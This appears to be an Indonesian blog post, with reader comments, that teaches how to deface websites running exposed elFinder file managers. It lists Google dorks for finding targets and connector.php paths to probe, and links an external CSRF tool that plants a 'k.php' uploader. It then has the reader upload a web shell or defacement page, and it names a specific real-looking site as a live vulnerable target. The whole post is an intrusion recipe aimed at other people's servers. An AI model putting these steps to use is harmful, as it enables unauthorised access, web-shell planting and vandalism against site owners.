Ketemu lagi Dengan Saya SangPujaan Yang Gans ini ;v
Dah gak usah bnyak bct. Bacot aja di gedein skill gak ada sama kaya gua ;v
Gua mau ngasih tutorial deface Metode elFinder
dah pada tau belom??....
yang pro mah dah pada tau :)
coba yg noob kaya aku belum tau ;(
Bahan :
1. Internet
2. Pc/Hp
3. Dork : inurl:/elfinder/php/
inurl:/elfinder/elfinder.html
inurl:/elfinder/elfinder.src.html
inurl:/elfinder/elfinder.php.html
inurl:/elfinder/elfinder.php
4. Exploit : /elfinder/php/connector.php
/elfinder/php/connector.minimal.php
5. CSRF elFinder : https://pastebin.com/raw/wcpevk2w (punya IndoXploit ;v)
Langkah :
1. Dorking menggunakan dork di atas
2. Cari target yg menurut lu bisa di eksekusi
3. Exploitkan target yg menurut lu bisa di eksekusi,
contoh : ( site/[path]/elfinder/php/connector.php)
4. kalo muncul kaya begini {"error":["errUnknownCmd"]} Bisa untuk di lanjut
5. Tanem CSRF elFinder di web yg dah ke upload shell lu .
6. Buka CSRF elFinder nya, Masukan target tadi yg sudah di exploitin klik "hajar"
7. Tunggu sampai selesai
8. Kalo vuln akan menampilkan seperti ini "Coba buka di ../../elfinder/files/..." dan langsung tertanem uploader "k.php"
9. tinggal akses uploader nya "site/[path]/elfinder/files/k.php"
10. tinggal upload shell / sc deface lewat uploader nya.
Sekian tutorial dari saya terimakasih :)
Live : "http://www.global-shopping-forum.com/elfinder/php/connector.php"
Sungkem master /\
BalasHapusThanks tutor nya sterr sangad berguna :*